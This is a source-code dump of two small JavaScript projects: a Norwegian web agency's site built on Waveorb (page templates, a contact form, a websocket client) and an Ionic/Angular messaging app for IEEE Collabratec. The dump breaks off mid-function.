<script defer data-domain="speria.no" src="https://tactility.no/js/tactility.js"></script>
</head>
<body>
<div class="top-nav">
<div class="speria-logo">
<a href="${$.link('index')}">
<img class="speria-logo" src="/img/speria-logo.svg" alt="logo">
</a>
</div>
<nav id="navi-mob">
<a href="#" aria-label="menu" onclick="toggleMenu(this); return false"><i class="kube-menu active"></i></a>
<ul id="menu">
<li><a href="${$.link('index')}">${$.t('nav1')}</a></li>
<li><a href="${$.link('design-utvikling')}">${$.t(
'nav_tjenester1'
)}</a></li>
<li><a href="${$.link('seo-marketing')}">${$.t(
'nav_tjenester2'
)}</a></li>
<li><a href="${$.link('hosting-drift')}">${$.t(
'nav_tjenester3'
)}</a></li>
<li><a href="${$.link('om-oss')}">${$.t('nav3')}</a></li>
<li><a href="${$.link('index')}#prosjekter">${$.t(
'nav4'
)}</a></li>
<li><a href="${$.link('index')}#kontakt">${$.t('nav5')}</a></li>
</ul>
</nav>
<script>
function toggleMenu(a) {
var menu = $('#menu'), timer = 500, icon = a.querySelector('i');
$(icon).toggleClass('active');
// Toggle menu
if(menu.is(':visible')) {
menu.animate({ right: '-200px', opacity: 0} , timer, function(){
$(this).hide();
});
} else {
menu.show();
menu.animate({ right: '0', opacity: 0.95} , timer);
}
}
</script>
<div class="lang-switch">
<a class="langlink" href="${$.link(
`en@${$.<EMAIL>}`
)}" onclick="window.cookie('lang', 'en')">EN</a>
<span class="split">/</span>
<a class="langlink" href="${$.link(
`<EMAIL>}`
)}" onclick="window.cookie('lang', 'no')">NO</a>
</div>
<nav class="tabs" id="navi">
<ul>
<li>
<a href="${$.link('index')}">${$.t('nav1')} |</a>
</li>
<li>
<a href="" data-component="dropdown" data-target="#dropdown-fixed">
${$.t('nav2')}
<span class="caret down"> |</span>
</a>
</li>
<li>
<a href="${$.link('om-oss')}">${$.t('nav3')} |</a>
</li>
<li><a id="prosjekt-link" href="${$.link(
'index'
)}#prosjekter">${$.t('nav4')} |</a></li>
<li><a id="kontakt-link" href="${$.link('index')}#kontakt">${$.t(
'nav5'
)}</a></li>
</ul>
</nav>
<script>${init}; init();</script>
<div class="dropdown hide" id="dropdown-fixed">
<ul>
<li><a href="${$.link('design-utvikling')}">${$.t(
'nav_tjenester1'
)}</a></li>
<li><a href="${$.link('seo-marketing')}">${$.t(
'nav_tjenester2'
)}</a></li>
<li><a href="${$.link('hosting-drift')}">${$.t(
'nav_tjenester3'
)}</a></li>
</ul>
</div>
</div>
${$.page.content}
<footer>
<p>2022 Design and code by Speria Creative</p>
</footer>
<script>cookie('lang', '${$.lang}')</script>
</body>
</html>
`
}
<file_sep>/app/pages/om-oss.js
module.exports = async function($) {
$.page.description = $.t('om-oss_meta')
$.page.title = $.t('om-oss_title')
return /* html */`
<div class="top-wrapper pale-background">
<div class="top-row">
<div class="top-column image">
<div class="top-image">
<img src="/img/speria-creative-about-opt.svg" alt="image">
</div>
</div>
<div class="top-column text">
<div class="top-text">
<h1>${ $.t('om_oss_tittel') }</h1><hr style="width:12%; position: relative; left: -2rem">
<p>“ ${ $.t('om_oss_undertittel_bilde') } ”</p>
</div>
</div>
</div>
</div>
<div class="full-width border-row light-background">
<div class="intro-om-oss inner-width">
<h2>We don't work to live - We live to work</span></h2>
<p>${ $.t('om_oss_tekst1') }</p>
<p>${ $.t('om_oss_tekst2') }</p>
<p>${ $.t('om_oss_tekst3') }</p>
<h3>${ $.t('om_oss_tittel1') }</h3>
<blockquote>${ $.t('om_oss_tekst4') }</blockquote>
<blockquote>${ $.t('om_oss_tekst5') }</blockquote>
<blockquote>${ $.t('om_oss_tekst6') }</blockquote>
<blockquote>${ $.t('om_oss_tekst7') }</blockquote>
<blockquote>${ $.t('om_oss_tekst8') }</blockquote>
<blockquote>${ $.t('om_oss_tekst9') }</blockquote>
<a class="button small" href="${ $.link('index') }#kontakt"> ${ $.t('om_oss_tekst10') }</a>
</div>
</div>
`
}
<file_sep>/app/components/projects.js
module.exports = async function($) {
return /* html */`
<div class="full-width border-row light-background">
<div class="inner-width-wide">
<div class="portfolio">
<h2 id="prosjekter">${ $.t('index_prosjekter') }</h2>
<hr style="width:5%; margin-top: -12px; margin-left: 3em;">
</div>
</div>
<div class="fade">
<figure>
<div class="slideshow-container">
<div class="mySlides fade">
<img src="/img/asylet.png" alt="portfolie_asylet">
<div class="text-slider"><h4><a href="https://asylet.no" target="_blank" rel="noopener">Kafé Asylet</a></h4></div>
</div>
<div class="mySlides fade">
<img src="/img/vdb-autoshine.png" alt="portfolie_VDB Autoshine">
<div class="text-slider"><h4><a href=" https://vdbautoshine.no" target="_blank" rel="noopener">VDB Autoshine nettbutikk</a></h4></div>
</div>
<div class="mySlides fade">
<img src="/img/tabibito.jpg" alt="portfolie_tabibito">
<div class="text-slider"><h4><a href="http://tabibito.no" target="_blank" rel="noopener">Tabibito Asian Fusion Restaurant</a></h4></div>
</div>
<div class="mySlides fade">
<img src="/img/crowdfundhq.jpeg" alt="portfolie_crowdfundhq">
<div class="text-slider"><h4><a href="https://crowdfundhq.com" target="_blank" rel="noopener">CrowdfundHQ - Create your own site</a></h4></div>
</div>
<div class="mySlides fade">
<img src="/img/waveorb.jpeg" alt="portfolie_waveorb">
<div class="text-slider"><h4><a href="https://waveorb.com" target="_blank" rel="noopener">Waveorb - Personal, marketing and support emails</a></h4></div>
</div>
<a class="prev" onclick="plusSlides(-1)">❮</a>
<a class="next" onclick="plusSlides(1)">❯</a>
</div>
</figure>
</div>
</div>
<div class="go-top">
<a id="arrow-up" href="javascript:void(0)"><img src="/img/arrow-up.svg" alt="arrow_up" title="Scroll to the top"></a>
</div>
<script>
var index = 0, tick = 5000, timer, i
, slides = document.getElementsByClassName('mySlides');
document.addEventListener('DOMContentLoaded', function(){
for(i = 0; i < slides.length; i++) {
slides[i].addEventListener('mouseenter', function(event){
var t = event.srcElement.querySelector('.text-slider');
$(t).fadeIn();
clearTimeout(timer);
});
slides[i].addEventListener('mouseleave', function(event){
var t = event.srcElement.querySelector('.text-slider');
$(t).fadeOut();
restartTimer();
});
}
});
function restartTimer() {
clearTimeout(timer);
timer = setTimeout(carousel, tick);
}
function plusSlides(n) {
showSlides(index += n);
}
function currentSlide(n) {
showSlides(index = n);
}
function carousel() {
showSlides(index += 1);
}
function showSlides(n) {
if (n > slides.length){ index = 1;}
if (n < 1){ index = slides.length;}
for (i = 0; i < slides.length; i++) {
slides[i].style.display = 'none';
}
slides[index-1].style.display = 'block';
restartTimer();
}
carousel();
</script>
`
}
<file_sep>/app/components/about.js
module.exports = async function($) {
return /* html */ `
<div class="full-width border-row light-background">
<div class="about-us inner-width-wide">
<div class="row gutters">
<div class="col col-6 about-us-intro">
<h2>${ $.t('index_om_oss_tittel') }</h2>
<hr style="width:6%; margin-top: -12px; padding-bottom: 1rem;">
<p>${ $.t('index_om_oss1') }</p>
<p>${ $.t('index_om_oss2') }</p>
<a href="${ $.link('om-oss') }">${ $.t('index_les_mer') }</a>
</div>
<div class="col col-6 about-us-image">
<img src="/img/screen_demo.jpeg" alt="image">
</div>
</div>
</div>
</div>
`
}<file_sep>/app/actions/contact/create.js
module.exports = {
validate: {
values: {
name: {
minlength: 2
},
email: {
is: '$email'
},
subject: {
in: ['price', 'questions', 'marketing', 'design', 'hosting', 'other']
},
message: {
minlength: 5
}
}
},
main: async function($) {
// Gather parameters sent from the client
const { name, phone, email, subject, message } = $.params.values
const data = { name, email, phone, message }
const options = { subject, from: email }
// Send the email and return the result
return await $.app.mailer.send('contact', $, options, data)
}
}
<file_sep>/app/assets/js/waveorb.js
(function() {
var socket = async function(url, options) {
// Connection ready states for web socket
var CONNECTING = 0
var OPEN = 1
var CLOSING = 2
var CLOSED = 3
// Connection close codes
var CLOSE_NORMAL = 1000
var CLOSE_AWAY = 1001
// Callback identifier
var CBID = '$cbid'
// Options
if (!options) options = {}
if (typeof options.reconnect === 'undefined' || options.reconnect === true) options.reconnect = 1000
if (options.ping === true) options.ping = 1000
if (typeof options.disconnect === 'undefined') options.disconnect = 3000
// Variables
var socket, callbacks, cid, interval, timeout, events = {}
// Events
var EVENTS = ['message', 'open', 'close', 'error']
for (var i = 0; i < EVENTS.length; i++) {
events[EVENTS[i]] = []
}
// Register events
function on(name, fn) {
events[name].push(fn)
}
function run(name, ...args) {
for (var i = 0; i < events[name].length; i++) {
events[name][i](...args)
}
}
function connect(resolve, reject) {
callbacks = {}
cid = 0
socket = new WebSocket(url)
socket.onmessage = function(event) {
var data = JSON.parse(event.data)
var id = data[CBID]
if (id) {
delete data[CBID]
if (callbacks[id]) {
callbacks[id](data, event)
delete callbacks[id]
}
} else {
run('message', data, event)
}
}
socket.onopen = function(event) {
if (resolve) resolve(api)
run('open', api, event)
ping()
}
socket.onerror = function(event) {
if (reject) reject(event)
run('error', event)
}
socket.onclose = function(event) {
if (options.reconnect) {
setTimeout(connect, options.reconnect)
}
run('close', event)
}
}
function disconnect(code) {
code = code || CLOSE_NORMAL
socket.close(code)
}
function ping() {
if (options.ping) {
clearInterval(interval)
clearTimeout(timeout)
interval = setInterval(function() {
send({
$ping: 1
})
}, options.ping)
timeout = setTimeout(function() {
clearInterval(interval)
disconnect(CLOSE_AWAY)
}, options.disconnect)
}
}
function send(params) {
if (socket.readyState === OPEN) {
socket.send(JSON.stringify(params))
}
}
function fetch(params) {
return new Promise(function(resolve) {
params[CBID] = ++cid
callbacks[cid] = function(data) {
resolve(data)
}
send(params)
})
}
var api = {
on,
connect,
send,
fetch,
disconnect
}
return new Promise(connect)
};
var http = function(url, params, options) {
return new Promise(function(resolve, reject) {
if (!options) options = {}
if (!params) params = {}
var xhr = new XMLHttpRequest()
xhr.addEventListener('load', function() {
var json = JSON.parse(xhr.responseText)
resolve(json)
})
xhr.addEventListener('error', function() {
reject(xhr)
})
xhr.open(options.method || 'POST', url + (options.path || ''))
// Set up upload if we have files
var data
if (options.files) {
data = new FormData()
// Add params to data
for (var key in params) {
data.append(key, JSON.stringify(params[key]))
}
// Loop through each of the selected files
for (var file of options.files) {
data.append('file', file, file.name)
}
if (options.progress) {
xhr.upload.addEventListener('progress', function(event) {
event.percent = (event.loaded / event.total * 100).toFixed(2)
options.progress(event)
})
}
} else {
xhr.setRequestHeader('Content-Type', 'application/json; charset=utf-8')
}
if (options.headers) {
for (var key in options.headers) {
xhr.setRequestHeader(key, options.headers[key])
}
}
// Send data to server
xhr.withCredentials = true
xhr.send(data || JSON.stringify(params))
})
};
window.waveorb = function(url, config = {}) {
if (!url.indexOf('ws')) {
return new Promise(function(resolve) {
socket(url, config).then(function(s) {
return resolve(s.fetch)
})
})
}
return function(data = {}, options = {}) {
return http(url, data, options)
}
}
}())
<file_sep>/README.md
# speria-creative
<file_sep>/app/pages/hosting-drift.js
module.exports = async function($) {
$.page.description = $.t('host_meta')
$.page.title = $.t('host_title')
return /* html */`
<div class="top-wrapper pale-background">
<div class="top-row">
<div class="top-column image">
<div class="top-image">
<img src="/img/speria-creative-hosting-support-opt.svg" alt="image">
</div>
</div>
<div class="top-column text">
<div class="top-text">
<h1>${ $.t('hosting_tittel') }</h1><hr style="width:14%; position: relative; left: 2rem">
<p>“ ${ $.t('hosting_undertittel_bilde') } ”</p>
</div>
</div>
</div>
</div>
<div class="full-width border-row light-background">
<div class="intro-hosting inner-width">
<h2>${ $.t('hosting_tekst_bilde') }</h2>
<p>${ $.t('hosting_tekst1') }</p>
<h3>${ $.t('hosting_tittel1') }</h3>
<p>${ $.t('hosting_tekst2') }</p>
<h3>${ $.t('hosting_tittel2') }</h3>
<p>${ $.t('hosting_tekst3') }</p><br>
<p>${ $.t('hosting_tekst4') }</p><br>
<a href="${ $.link('index') }?subject=hosting#kontakt" class="button small" role="button">${ $.t('hosting_tekst5') }</a>
</div>
</div>
`
}
<file_sep>/app/assets/js/app.js
document.addEventListener('DOMContentLoaded', function(){
$('#prosjekt-link').click(function(){
$('html, body').animate({
scrollTop: $('#prosjekter').offset().top
}, 1500);
});
$('#kontakt-link').click(function(){
$('html, body').animate({
scrollTop: $('#kontakt').offset().top
}, 1500);
});
$('#arrow-up').click(function(){
$('html, body').animate({
scrollTop: $('#navi').offset().top
}, 1500);
});
});
<file_sep>/app/pages/index.js
const contact= require('../components/contact.js')
const projects = require('../components/projects.js')
const services = require('../components/services.js')
const about = require('../components/about.js')
module.exports = async function($) {
$.page.description = $.t('index_meta')
$.page.title = $.t('index_title')
return /* html */`
<div class="top-wrapper pale-background">
<div class="top-row">
<div class="top-column image">
<div class="top-image frontpage">
<img src="/img/speria-creative-main-opt.svg" alt="image">
</div>
</div>
<div class="top-column text">
<div class="top-text main">
<h1>Speria Creative</h1>
<hr style="width:14%;">
<p>“ ${ $.t('index_undertittel_bilde') } ”</p>
<hr style="width:10%;margin-left:-28%">
</div>
</div>
</div>
</div>
${ await about($) }
${ await services($) }
${ await projects($) }
${ await contact($) }
`
}
<file_sep>/app/components/services.js
module.exports = async function($) {
return /* html */ `
<div class="full-width border-row pale-background">
<div class="tjenester inner-width-wide">
<div class="row">
<div class="col col-12 title-space">
<h2>${ $.t('index_tjenester_tittel') }</h2>
<hr style="width:4%; margin-top: -12px; margin-left: 4em;">
<p>${ $.t('index_tjenester') }</p>
</div>
</div>
<div class="row gutters paragraph">
<a href="${ $.link('design-utvikling') }" class="col col-4 service-card light-background">
<div class="circle">
<img class="img-circle" src="/img/design-icon.svg" alt="design icon">
</div>
<div class="service-text">
<h3>${ $.t('index_design_tittel') }</h3>
<p>${ $.t('index_design') }</p>
<span>${ $.t('index_les_mer') }</span>
</div>
</a>
<a href="${ $.link('seo-marketing') }" class="col col-4 service-card light-background">
<div class="circle">
<img class="img-circle" src="/img/seo-icon.svg" alt="seo icon">
</div>
<div class="service-text">
<h3>${ $.t('index_seo_tittel') }</h3>
<p>${ $.t('index_seo') }</p>
<span>${ $.t('index_les_mer') }</span>
</div>
</a>
<a href="${ $.link('hosting-drift') }" class="col col-4 service-card light-background">
<div class="circle">
<img class="img-circle" src="/img/hosting-icon.svg" alt="hosting icon">
</div>
<div class="service-text">
<h3>${ $.t('index_hosting_tittel') }</h3>
<p>${ $.t('index_hosting') }</p>
<span>${ $.t('index_les_mer') }</span>
</div>
</a>
</div>
</div>
</div>
`
}<file_sep>/app/components/contact.js
const subjects = ['price', 'questions', 'marketing', 'design', 'hosting', 'other']
module.exports = async function($) {
// Methods
function clearField(el) {
var field = q('span.form-error', el.parentNode)
text(field, '')
}
async function sendEmail(form) {
var button = q('.form-button')
button.disabled = true
// Sleep:
await new Promise(r => setTimeout(r, 500))
var values = serialize(form)
const result = await api({ action: 'contact/create', values })
if (result.error) {
css('.message.error', 'opacity: 1')
window.location = '#kontakt'
if (result.values) {
Object.keys(result.values).forEach(function(key) {
text(`.${key}-error`, result.values[key].join(', '))
})
}
button.disabled = false
} else {
form.reset()
window.location = $.link('bekreftelse')
}
}
// Components
function renderSubjectOptions() {
return subjects.map(function(subject) {
var value = $.t(`subjects_${ subject }`)
var selected = $.query.subject && subject === $.query.subject ? 'selected' : ''
return `<option value="${ subject }" ${ selected }>${ value }</option>`
}).join('')
}
return /* html */`
<div class="full-width border-row pale-background">
<div class="contact-form inner-width-wide">
<div class="row gutters">
<div class="col col-4 ta-kontakt" id="kontakt">
<h2>${ $.t('index_kontakt_tittel') }</h2>
<hr style="width:10%; margin-top: -12px; margin-left: 3em; padding-bottom: 1rem;">
<p>${ $.t('index_kontakt1') }</p>
<p>${ $.t('index_kontakt2') }</p><br>
<p>
<img class="icon" src="/img/envelope.svg" alt="Email icon"><a href="mailto:<EMAIL>"><EMAIL></a>
</p>
<p>
<img class="icon" src="/img/place.svg" alt="Address icon"> Oslo, ${ $.t('index_nor') }
</p>
</div>
<div class="col col-8">
<div class="message error">
${ $.t('correct_errors') }
<span class="close small" onclick="this.parentNode.style.display='none'"></span>
</div>
<form action="${ $.link('index') }" method="post" class="form" autocomplete="off" onsubmit="sendEmail(this); return false">
<div class="row gutters">
<div class="col col-6">
<div class="form-item">
<label for="input-name">${ $.t('index_kontakt_form1') }<span class="req">*</span></label>
<input id="input-name" type="text" name="name" placeholder="<NAME>" onfocus="clearField(this)">
<span class="form-error name-error error-message"></span>
</div>
</div>
<div class="col col-6">
<div class="form-item">
<label for="input-phone">${ $.t('index_kontakt_form2') }</label>
<input id="input-phone" type="text" name="phone" placeholder="22222222" onfocus="clearField(this)">
<span class="form-error phone-error error-message"></span>
</div>
</div>
</div>
<div class="row gutters">
<div class="col col-6">
<div class="form-item">
<label for="input-email">${ $.t('index_kontakt_form3') }<span class="req">*</span></label>
<input id="input-email" type="text" name="email" placeholder="<EMAIL>" onfocus="clearField(this)">
<span class="form-error email-error error-message"></span>
</div>
</div>
<div class="col col-6">
<div class="form-item">
<label for="input-option">${ $.t('index_kontakt_form4') }<span class="req">*</span></label>
<select id="input-option" name="subject" onfocus="clearField(this)">
<option value="">---</option>
${ renderSubjectOptions() }
</select>
<span class="form-error subject-error error-message"></span>
</div>
</div>
</div>
<div class="form-item">
<label for="input-message">${ $.t('index_kontakt_form5') }</label>
<textarea id="input-message" rows="6" name="message" placeholder="${ $.t('index_kontakt_form_write') }" onfocus="clearField(this)"></textarea>
<span class="form-error message-error error-message"></span>
</div>
<div class="form-item">
<button class="form-button w100 button-style">
<span>Send</span>
<img class="loader" src="/img/loader.svg">
</button>
</div>
</form>
</div>
</div>
</div>
</div>
<script>${ sendEmail };${ clearField }</script>
`
}<file_sep>/app/layouts/mail.js
module.exports = async function(mail, $, data) {
console.log(mail)
return /* html */`
<!doctype html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>${ mail.subject || 'Speria kontakt' }</title>
<style>
body {
background-color: white;
}
</style>
</head>
<body>
<div class="content">${ mail.content }</div>
</body>
</html>
`
}
|
9ad2a3119c207453a274385515b05b0df8730244
|
[
"JavaScript",
"Markdown"
] | 13
|
JavaScript
|
suspha/speria-creative
|
cbbecdd4dc63a605b8e1583e368b5228ed0c7603
|
6c645057090af6a34dea1376e2a20f7122a8f97a
|
refs/heads/master
|
<file_sep>// Imports
import { Injectable } from '@angular/core';
import { Http, Response, Headers, RequestOptions } from '@angular/http';
import { Observable } from 'rxjs/Observable';
// Import RxJs required methods
import 'rxjs/add/operator/map';
import 'rxjs/add/operator/catch';
import 'rxjs/add/operator/toPromise';
import 'rxjs/add/observable/throw'
@Injectable()
export class MessageService {
// Resolve HTTP using the constructor
constructor (private http: Http) {}
// private instance variable to hold base url
private messageUrl = 'https://ieee-collabratecapi.ieee.org/v1/';
public messageContainer:any = {};
getMessages(tokenObject):Observable<any>{
//console.log('tokenObject is:'+JSON.stringify(tokenObject));
let authTokenValue = tokenObject.property['auth-token'];
let authDataValue = tokenObject.property['auth-data'];
let awsapikey = tokenObject.property.awsapi.access_token;
let startThread = 0;
let fetchFirstThread = false;
let payload = {"startRecord":startThread,"fetchFirstThread":fetchFirstThread};
authDataValue = JSON.stringify(authDataValue);
console.log('authdata value:'+authDataValue);
let headers = new Headers({'Content-Type': 'application/json','ctSSOToken':authTokenValue,'ctSSOAuthData':authDataValue,'x-api-key':awsapikey}); // ... Set content type to JSON
let options = new RequestOptions({ headers: headers}); // Create a request option
let getmessageapi = this.messageUrl+'message/getAllMessages';
return this.http.post(getmessageapi,payload,options) // ...using post request
.map(this.extractData) // ...and calling .json() on the response to return data
.catch(this.handleError); //...errors if any
}
getYourConnections(key,pageno,pagelimit,val1,val2,val3,val4,val5,tokenObject):Observable<any>{
let authTokenValue = tokenObject.property['auth-token'];
let authDataValue = tokenObject.property['auth-data'];
let awsapikey = tokenObject.property.awsapi.access_token;
authDataValue = JSON.stringify(authDataValue);
let headers = new Headers({'Content-Type': 'application/json','ctSSOToken':authTokenValue,'ctSSOAuthData':authDataValue,'x-api-key':awsapikey}); // ... Set content type to JSON
let options = new RequestOptions({ headers: headers}); // Create a request option
//this.messageUrl = this.messageUrl+'connections/connect/search?'+'key='+key+'&page='+pageno+'&items='+pagelimit+'&society='+val1+'§ion='+val2+'&location='+val3+'&myMentors='+val4+'&myMentees='+val5+'&custKey='+'';
let getconnectionsapi = this.messageUrl+'connections/connect/search?'+'key='+key+'&page='+pageno+'&items='+pagelimit+'&society='+val1+'§ion='+val2+'&location='+val3+'&myMentors='+val4+'&myMentees='+val5+'&custKey='+'';
return this.http.get(getconnectionsapi,options) // ...using post request
.map(this.extractData) // ...and calling .json() on the response to return data
.catch(this.handleError); //...errors if any
}
set MessageContainer(infoarray){
// this.messageContainer = {};
// this.messageContainer.msgTitleText = msgTitleText;
// this.messageContainer.encSelList = encSelList;
console.log('inforarray is:'+infoarray);
this.messageContainer = {};
this.messageContainer.msgTitleText = infoarray[0];
this.messageContainer.encSelList = infoarray[1];
}
get getMessageContainer() {
return this.messageContainer;
}
getMessageThread(msgId,messageTimeStamp, timeStampDirection,tokenObject):Observable<any>{
let authTokenValue = tokenObject.property['auth-token'];
let authDataValue = tokenObject.property['auth-data'];
let awsapikey = tokenObject.property.awsapi.access_token;
let payload = messageTimeStamp ? (timeStampDirection === 'oldest' ? {
'msgId': msgId,
'oldestMessageTimeStamp': messageTimeStamp
} : {
'msgId': msgId,
'latestMessageTimeStamp': messageTimeStamp
}) : {
'msgId': msgId
};
//let payload = {"startRecord":startThread,"fetchFirstThread":fetchFirstThread};
authDataValue = JSON.stringify(authDataValue);
let headers = new Headers({'Content-Type': 'application/json','ctSSOToken':authTokenValue,'ctSSOAuthData':authDataValue,'x-api-key':awsapikey}); // ... Set content type to JSON
let options = new RequestOptions({ headers: headers}); // Create a request option
//this.messageUrl = this.messageUrl+'message/'+'getMessageThread';
let messagethreadapi = this.messageUrl+'message/'+'getMessageThread';
return this.http.post(messagethreadapi,payload,options) // ...using post request
.map(this.extractData) // ...and calling .json() on the response to return data
.catch(this.handleError); //...errors if any
}
sendMessage(messagetext,autolinkerlist,encSelList,tokenObject):Observable<any>{
let authTokenValue = tokenObject.property['auth-token'];
let authDataValue = tokenObject.property['auth-data'];
let awsapikey = tokenObject.property.awsapi.access_token;
let payload = {"desc":messagetext,'autoLinkerList':autolinkerlist,"encSelList":encSelList};
//let payload = {"startRecord":startThread,"fetchFirstThread":fetchFirstThread};
authDataValue = JSON.stringify(authDataValue);
let headers = new Headers({'Content-Type': 'application/json','ctSSOToken':authTokenValue,'ctSSOAuthData':authDataValue,'x-api-key':awsapikey}); // ... Set content type to JSON
let options = new RequestOptions({ headers: headers}); // Create a request option
//this.messageUrl = this.messageUrl+'message/'+'sendMessage';
let sendmessageapi = this.messageUrl+'message/'+'sendMessage';
return this.http.post(sendmessageapi,payload,options) // ...using post request
.map(this.extractData) // ...and calling .json() on the response to return data
.catch(this.handleError); //...errors if any
}
replyMessage(messagetext,autolinkerlist,messageid,tokenObject):Observable<any>{
let authTokenValue = tokenObject.property['auth-token'];
let authDataValue = tokenObject.property['auth-data'];
let awsapikey = tokenObject.property.awsapi.access_token;
let payload = {"desc":messagetext,'autoLinkerList':autolinkerlist,"msgId":messageid};
//let payload = {"startRecord":startThread,"fetchFirstThread":fetchFirstThread};
authDataValue = JSON.stringify(authDataValue);
let headers = new Headers({'Content-Type': 'application/json','ctSSOToken':authTokenValue,'ctSSOAuthData':authDataValue,'x-api-key':awsapikey}); // ... Set content type to JSON
let options = new RequestOptions({ headers: headers}); // Create a request option
//this.messageUrl = this.messageUrl+'message/'+'replyMessage';
let replymessageapi = this.messageUrl+'message/'+'replyMessage';
return this.http.post(replymessageapi,payload,options) // ...using post request
.map(this.extractData) // ...and calling .json() on the response to return data
.catch(this.handleError); //...errors if any
}
getMessageParticipants(msgId,tokenObject):Observable<any>{
let authTokenValue = tokenObject.property['auth-token'];
let authDataValue = tokenObject.property['auth-data'];
let awsapikey = tokenObject.property.awsapi.access_token;
let payload = {'msgId': msgId};
//let payload = {"startRecord":startThread,"fetchFirstThread":fetchFirstThread};
authDataValue = JSON.stringify(authDataValue);
let headers = new Headers({'Content-Type': 'application/json','ctSSOToken':authTokenValue,'ctSSOAuthData':authDataValue,'x-api-key':awsapikey}); // ... Set content type to JSON
let options = new RequestOptions({ headers: headers}); // Create a request option
//this.messageUrl = this.messageUrl+'message/'+'replyMessage';
let getparticipantsapi = this.messageUrl+'message/'+'getMessageParticipants';
return this.http.post(getparticipantsapi,payload,options) // ...using post request
.map(this.extractData) // ...and calling .json() on the response to return data
.catch(this.handleError); //...errors if any
}
private extractData(res:Response) {
//console.log('response is following'+JSON.stringify(res));
let body = res.json();
return body || [];
}
private handleError(error:any) {
// In a real world app, we might use a remote logging infrastructure
// We'd also dig deeper into the error to get a better message
//console.log('error is'+JSON.stringify(error));
let errMsg = (error.message) ? error.message :
error.status ? `${error.status} - ${error.statusText}` : 'Server error';
console.error(errMsg); // log to console instead
return Observable.throw(errMsg);
}
}<file_sep>import { Component } from '@angular/core';
import { NavController, NavParams } from 'ionic-angular';
import { AuthService } from '../../services/auth.service';
import { NativeStorage } from '@ionic-native/native-storage';
import { AlertController } from 'ionic-angular';
import { LoadingController } from 'ionic-angular';
import { HomePage } from '../home/home';
@Component({
selector: 'page-auth',
templateUrl: 'auth.html',
providers:[AuthService]
})
export class AuthPage{
username:string = '';
password:string = '';
errormessage:string = '';
mode:'Observable';
constructor(public navCtrl: NavController,public navParams: NavParams,private authService:AuthService,private nativeStorage: NativeStorage,public alertCtrl: AlertController,public loadingCtrl: LoadingController) {
this.username = '<EMAIL>';
this.password = '<PASSWORD>';
}
private response:any = [];
private errorMessage:any = '';
Authenticate(){
let loader = this.loadingCtrl.create({
content: "Please wait...",
duration: 3000,
dismissOnPageChange: true
});
loader.present();
if(this.username == '' || this.password == ''){
let alert = this.alertCtrl.create({
title: 'Login',
subTitle: "Please enter username and password to login",
buttons: ['OK']
});
alert.present();
}else{
this.authService.authenticateUser(this.username,this.password).subscribe(
response => {
// Emit list event
console.log('payload is following:'+response);
this.navCtrl.setRoot(HomePage);
this.nativeStorage.setItem('AuthResponse', {property: response})
.then(
() => console.log('Stored item!'),
error => console.error('Error storing item', error)
);
},
err => {
let alert = this.alertCtrl.create({
title: 'Authentication Failed',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
}
}
}
<file_sep>import { Component, OnInit, ViewEncapsulation ,ViewChild} from '@angular/core';
import { ModalController,NavController, Nav,NavParams} from 'ionic-angular';
import { NativeStorage } from '@ionic-native/native-storage';
import { AlertController } from 'ionic-angular';
import { LoadingController } from 'ionic-angular';
import { ModalContentPage } from '../message-modal/message-modal';
import { MessageService } from '../../services/message.service';
import { ChatPage } from '../../pages/message/chat/chat';
import * as _ from 'underscore/underscore';
@Component({
selector: 'page-message',
templateUrl: 'message.html',
providers:[MessageService]
})
export class MessagePage implements OnInit{
@ViewChild(Nav) nav: Nav;
public messages:any = [];
public siebCustId:any = '';
public targetPeople:any = [];
private response:any = [];
private errorMessage:any = '';
constructor(public navCtrl: NavController,public navParams: NavParams,private messageService:MessageService,private nativeStorage: NativeStorage,public alertCtrl: AlertController,public loadingCtrl: LoadingController,public modalCtrl: ModalController) { }
refreshPage(refresher){
this.nativeStorage.getItem('AuthResponse')
.then(
data => {
this.siebCustId = data.property['auth-data'].siebcustid;
this.messageService.getMessages(data).subscribe(
response => {
refresher.complete();
let smData = response.data;
this.messages = smData.hits;
this.targetPeople = smData.targetPeople;
this.targetPeople = this.targetPeople.length === 0 ? this.targetPeople : _.uniq(this.targetPeople, function (e) {
return e.siebelNr;
});
this.populateChatParticipantLabel(this.siebCustId);
},
err => {
refresher.complete();
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
},
error => console.error(error)
);
}
ngOnInit(){
//this.nav.setRoot(MessagePage);
let loader = this.loadingCtrl.create({
content: "Please wait...",
duration: 3000,
dismissOnPageChange: true
});
loader.present();
this.nativeStorage.getItem('AuthResponse')
.then(
data => {
this.siebCustId = data.property['auth-data'].siebcustid;
this.messageService.getMessages(data).subscribe(
response => {
let smData = response.data;
this.messages = smData.hits;
this.targetPeople = smData.targetPeople;
this.targetPeople = this.targetPeople.length === 0 ? this.targetPeople : _.uniq(this.targetPeople, function (e) {
return e.siebelNr;
});
this.populateChatParticipantLabel(this.siebCustId);
},
err => {
let alert = this.alertCtrl.create({
title: 'Message Failure',
subTitle: err,
buttons: ['OK']
});
alert.present();
this.errorMessage = <any>err;
});
},
error => console.error(error)
);
}
populateChatParticipantLabel(siebelno) {
let targetpeople = this.targetPeople;
_(this.messages).each(function (msg) {
msg.targetIdsCopy = _.clone(msg.targetIds); // Get All Target Ids
if (!_.includes(msg.targetIdsCopy, msg.ownerList[0].siebelNr)) {
msg.targetIdsCopy.unshift(msg.ownerList[0].siebelNr); // Add msg Owner
}
msg.targetIdsCopy = msg.targetIdsCopy.filter(function (e) {
return e != siebelno; // Remove myself
});
msg.chatParticipants = msg.targetIdsCopy
.map(function (target) {
return _.find(targetpeople, function (o) {
return o.siebelNr === target;
});
});
if (msg.chatParticipants[0].pictureUrl === '/assets/img/default-profile-picture.gif') {
msg.chatParticipants[0].pictureUrl = 'assets/img/icons/user-default-x3.png';
}
msg.cpLength = msg.chatParticipants.length;
if (msg.cpLength === 1) {
msg.chatParticipantLabel = msg.chatParticipants[0].fullName;
} else {
if (msg.cpLength <= 3)
msg.chatParticipantLabel = msg.chatParticipants.map(function (cp) {
if (cp === undefined) {
console.error(' cp is undefined in populateChatParticipantLabel : ' + JSON.stringify(msg.chatParticipants));
return '';
}
return cp.fullName.split(' ')[0];
}).join(', ');
else {
msg.chatParticipantLabel = msg.chatParticipants.map(function (cp) {
if (cp === undefined) {
//console.log(JSON.stringify(msg.chatParticipants));
return '';
}
return cp.fullName.split(' ')[0];
